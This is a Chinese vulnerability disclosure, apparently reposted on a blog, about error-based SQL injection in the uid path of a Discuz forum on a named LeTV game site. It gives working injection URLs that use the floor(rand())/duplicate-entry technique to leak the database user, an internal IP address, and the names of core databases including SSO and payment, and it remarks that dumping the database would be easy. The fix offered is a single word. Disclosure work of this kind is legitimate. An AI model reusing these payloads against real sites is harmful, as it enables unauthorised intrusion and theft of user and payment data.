mysql报错1408_乐视某Discuz论坛MySQL报错注入

uid可以注入:code 区域http://game.letv.com/bbs/space-uid-(select(1)from(select count(*), concat(floor(rand(0)*2),0x5e5e5e,user()) x from information_schema.character_sets group by x)y).html

Error: Duplicate entry '1^^^letv@10.140.202.203' for key 'group_key'

imgpxy.php?url=gnp.799965023291214102%2F2141_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

漏洞证明:

数据库:code 区域letv_forum

letv_activity

letv_card

letv_cms

letv_factory_page

letv_intranet

letv_paycenter

letv_sso

letv_tools

可以看到是最核心的几个库。。。

论坛的members表:

http://game.letv.com/bbs/space-uid-(select(1)from(select count(*), concat(floor(rand(0)*2),0x5e5e5e,(select concat(table_name,0x5e5e,table_schema) from information_schema.tables limit 117,1),0x5e5e5e) x from information_schema.character_sets group by x)y).html

可以较方便地拖库,未进一步测试。修复方案:

过滤

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值